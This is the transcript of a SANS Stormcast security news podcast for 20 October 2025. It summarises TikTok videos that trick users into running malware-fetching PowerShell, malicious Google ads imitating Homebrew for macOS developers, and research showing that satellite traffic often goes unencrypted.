SANS Stormcast Monday, October 20th, 2025: Malicious Tiktok; More Google Ad Problems; Satellite Insecurity

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9662.mp3

previous

Malicious Tiktok; More Google Ad Problems; Satellite Insecurity

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Monday, October 20th 2025
 edition of the SANS United Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu graduate certificate program in
 cybersecurity engineering. Tiktok apparently has learned
 from ClickFix. Xavier came across a TikTok video that
 advertised ways to get Photoshop for free. But of
 course, instead of getting free versions of expensive
 software, you're actually stuck with malware. The
 technique used here is very similar to what's commonly
 used as ClickFix where you're being prompted with a captcha
 and then you have to essentially copy paste
 PowerShell code into your PowerShell window on your
 Windows machine. Well, here, the difference is only that
 it's done via TikTok. So the TikTok video basically tells
 you how to copy or how to type the PowerShell script into
 your PowerShell window that of course, you're first being
 instructed to start as an administrator. And then while
 the malicious code is executed in this code, additional
 malware is being downloaded that will then essentially
 download info stealers or whatever the attacker would
 like to load on your system. Good news is that virus total
 promises a good recognition rate for at least this
 particular version of this scam. But there are hundreds
 literally out there that do similar things that again, no
 promise free software, but then trick you into actually
 executing this PowerShell code. And it's not always that
 obvious really what you're executing here, because
 they're kind of doing the Windows equivalent of just
 downloading some code and then piping it to a shell. So it's
 not that you're actually typing the code here into your
 PowerShell window, you're really just using PowerShell
 to download a file from a website and then executing it,
 which is a little bit more stealthy. And maybe people
 think it's even if they understand kind of what that
 PowerShell does, that they think, hey, you know, I'm just
 downloading some free software or some patch for the software
 to make it free. And that's maybe why this particular
 trick is still successful. And then talking about victims
 being tricked into executing malicious code. Well, we do
 have another case where actually Google ads are being
 used to advertise tools that are particularly popular with
 developers and you're somewhat focusing on macOS like
 Homebrew. Homebrew is this package manager allows you to
 install a lot of open source packages on macOS. I use it
 very popular, particularly with developers for installing
 additional tools, little command line utilities and
 such, Git extensions and things like that. So
 definitely one of the target groups here are developers and
 yes, they're then ending up again with info stealers. And
 that's what hunt.io here discovered as part of their
 blog post. Researchers at the University of California at
 San Diego, as well as the University of Maryland have
 demonstrated that it's relatively easy to not only
 eavesdrop on signals being sent to and from satellites,
 but also that much of that traffic is unencrypted. The
 information sort of was presented at a recent
 conference and the paper has now been made public. You may
 have seen some news reports about it about a week ago, but
 now we have the actual paper available and also no more
 paywall for the actual information in the paper. The
 lesson here really is something that's not really
 that new as soon as the network traffic leaves the
 network jack on your system. It does enter hostile
 territory. So you better make sure that you properly
 authenticate that you are properly encrypting your
 traffic and that you make sure that the traffic is not being
 altered in transit. And while your two main mechanisms to
 doing this is of course, TLS, that's usually the simplest
 way and the most common way how it is done, or via one of
 the many VPN options that you have available. There are some
 cases where you don't really have a choice. And the one
 example here that they point out is a good old phone calls,
 which are often also not encrypted. But basically, the
 satellite traffic itself does not offer any encryption. So
 you rely on whatever traffic is being sent to be already
 being encrypted before it's being passed to the satellite
 network. Of course, this also depends on the particular
 technology being used by the satellite. This here is sort
 of a more traditional telecommunication satellite,
 which really is just a relay of traffic. It doesn't really
 sort of alter the traffic like encryption or anything like
 that. That's not really the point of a satellite like
 this. More modern satellites like Starlink and similar
 constellations, they are actually encrypting traffic,
 of course, in part also to protect the network against
 the rogue access and making sure everybody has a proper
 account that accesses the network. Well, that's it for
 today. Remember, on Saturday, I'll be speaking at B-Sides
 Augusta. So hope to see some listeners there in person.
 Otherwise, thanks for liking and subscribing to this
 podcast and talk to you again tomorrow. Bye.